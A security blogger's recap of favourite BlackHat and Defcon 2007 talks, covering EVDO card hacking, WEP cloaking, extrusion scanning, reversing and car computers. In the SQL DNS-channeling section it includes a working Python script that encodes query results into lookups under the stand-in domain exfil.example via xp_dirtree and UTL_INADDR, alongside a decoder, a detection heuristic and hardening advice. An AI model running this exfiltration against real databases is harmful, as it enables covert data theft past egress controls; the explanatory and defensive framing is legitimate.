Wrapping Up the Cons: Best of BlackHat and Defcon 2007

DefCon 2007 (photo: Spot the Reporter, anyone?)

It was another good adventure out in Las Vegas last week. Obviously the best part of any con is the people who are there. It was great seeing old friends and meeting new ones. I typically ask everyone "what was the best presentation you saw?" so I thought I'd turn the tables and give my own answer to that question. I know I missed a few good ones (it would be hard to make a 9am talk in Las Vegas even if it were held in my hotel room), but here are the highlights from what I did catch.

EVDO Hacking (King Tuna) - I suspect most people found this talk more entertaining than educational, and King Tuna wins for best Ricky Gervais character impersonation. I found myself cringing in my seat at his unfortunate first-time-presenter problems, but we walked away with two kick-ass pieces of info. First, you can read files from your EVDO card with BitPim (or QPST if you have loose morals and bittorrent skillz). Second, the Kyocera KPC650 card's firmware is unlocked. Tasty.

SQL out-of-band Channeling (Patrik Karlsson) - No SQL error messages being returned? No problem. I'll just take my query results over DNS. Yup, that's right. Over DNS (I had to double check I hadn't just walked into the Kaminsky talk). The short version: a number of database functions will trigger DNS lookups. Craft "hostnames" that are really the data, make the database resolve them under a domain the attacker controls, and read the results out of the attacker's name server logs. Check the slides, because they go into depth on properly encoding and breaking up the data to fit DNS limits. This would get through just about any network architecture and firewall egress filter I've seen, since the database server never talks to the attacker directly; its own resolver does the work. Can you live without DNS lookups on your database server? Probably. Time to add that to your hardening checklists.
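The encoding and chunking part, as an added example (written for this post, not Patrik Karlsson's tool or slides): query results are hex-encoded and split into hostnames that respect DNS label and name limits, with a leading sequence label so the attacker's name server can reorder and de-duplicate retried queries; alongside it the attacker-side decoder, two database calls known to resolve a supplied name (SQL Server's xp_dirtree on a UNC path, Oracle's UTL_INADDR.GET_HOST_ADDRESS), and a defender-side heuristic for spotting the resulting labels in DNS logs. The domain exfil.example and the sample result string are constructed for illustration.

```python
"""Out-of-band SQL result exfiltration over DNS: wire format, decoder, detector.
Added example, not from the talk or its slides. The domain exfil.example and the
sample query result are constructed."""
import binascii
import re
from typing import Dict, Iterable, List

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # practical limit for a whole name in text form


def encode_for_dns(data: bytes, domain: str) -> List[str]:
    """Split `data` into hostnames under `domain` that fit DNS limits.

    Hex is used rather than base64 because DNS names are case-insensitive
    and some resolvers rewrite case. Each name starts with a sequence label
    so the receiver can reorder and de-duplicate retried queries.
    """
    hexdata = binascii.hexlify(data).decode()
    names, seq, pos = [], 0, 0
    while pos < len(hexdata):
        prefix, suffix = f"{seq}.", f".{domain}"
        budget = MAX_NAME - len(prefix) - len(suffix)  # room for payload labels
        labels = []
        while pos < len(hexdata) and budget > 0:
            take = min(MAX_LABEL, budget, len(hexdata) - pos)
            labels.append(hexdata[pos:pos + take])
            pos += take
            budget -= take + 1   # +1 for the dot that joins the next label
        names.append(prefix + ".".join(labels) + suffix)
        seq += 1
    return names


def decode_from_dns(queried_names: Iterable[str], domain: str) -> bytes:
    """Reassemble the data from names seen at the attacker's authoritative
    server. Tolerates duplicates and out-of-order arrival, and refuses to
    return silently corrupted data when a chunk never arrived."""
    suffix = "." + domain.lower()
    chunks: Dict[int, str] = {}
    for name in queried_names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        seq_str, _, payload = name[:-len(suffix)].partition(".")
        if seq_str.isdigit():
            chunks[int(seq_str)] = payload.replace(".", "")
    if sorted(chunks) != list(range(len(chunks))):
        raise ValueError("missing chunk(s), have %s" % sorted(chunks))
    return binascii.unhexlify("".join(chunks[i] for i in sorted(chunks)))


def mssql_query(name: str) -> str:
    """SQL Server: xp_dirtree on a UNC path makes the server resolve the host.
    In a real injection the name is built inside the query (e.g. with
    master.dbo.fn_varbintohexstr over the result); here it is assembled client-side."""
    return f"EXEC master..xp_dirtree '\\\\{name}\\x';"


def oracle_query(name: str) -> str:
    """Oracle: UTL_INADDR.GET_HOST_ADDRESS forces a forward lookup of `name`."""
    return f"SELECT UTL_INADDR.GET_HOST_ADDRESS('{name}') FROM dual;"


HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")


def looks_like_exfil(name: str) -> bool:
    """Defender-side heuristic for DNS logs from a database host: a label
    that is long and purely hexadecimal is data, not a hostname."""
    return any(HEX_LABEL.match(label) for label in name.lower().split("."))


if __name__ == "__main__":
    result = b"Microsoft SQL Server 2005 - 9.00.3042.00"  # constructed sample
    for n in encode_for_dns(result, "exfil.example"):
        print(mssql_query(n))
        print(oracle_query(n))
    print(looks_like_exfil("0.4d6963726f736f667420.exfil.example"))  # True
```

The decoder only sees what the attacker's authoritative server logs, which is why a sequence label and a completeness check matter: resolvers retry, cache and reorder. The hardening point from the talk follows directly: if the database host cannot resolve external names at all (no recursive DNS, no forwarder reachable), none of these queries ever leave the network.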

WEP Cloaking Exposed (Vivek Ramachandran) - Hopefully just reading the explanation of "WEP Cloaking" will make your security stomach feel like you've had sushi straight from the Chicago River. But if you've ever seen sales people, you know they can suck down anything and then try to sell it on the way out. Thankfully the AirTight group came to the table with strong examples of how flawed this security-through-obscurity "WEP Cloaking" idea is. While the rest of us don't yet have a tool to automate the process they showed, it's only a matter of time. A point to remember, they said, is that a WEP cloaking/chaffing product still won't make a WEP wireless network PCI compliant.

Extrusion Scanning (Matt Richards) - In the past, giving a customer a report about how many different ways we could tunnel data out of their internal network was equivalent to giving them a graph about how wet water is. The good news is we have started to see customers taking steps toward decently restricting outbound connections. Hopefully the eescan tool he talked about will be a way of quickly testing this from an internal network.

Active Reversing/Virtual World Hacking (Greg Hoglund) - I'm so not logging on to WoW if this guy is online. I caught sections of both Greg Hoglund talks and was impressed with the ideas and examples. This is not my normal cup of h4×0r tea, so I'm not sure how innovative these tools and techniques are, but I like the overall idea. The more someone can understand and trace a program without having to go breakpoint by breakpoint in IDA Pro, the better. Let's lower the bar and get more people disassembling. Greg demoed some HBGary tools to quickly and easily isolate the parts of a binary that contain functions of interest.

Hack Your Car (higB) - Sure, I may have a little bias here, but it was still one of my favorite talks. You own the car; shouldn't you own the computer in it? Pretty shocking to hear that emissions tests often rely just on what the car's computer reports and not on actual tailpipe output. Maybe we need to take this talk to an EPA convention next.

-b3nn
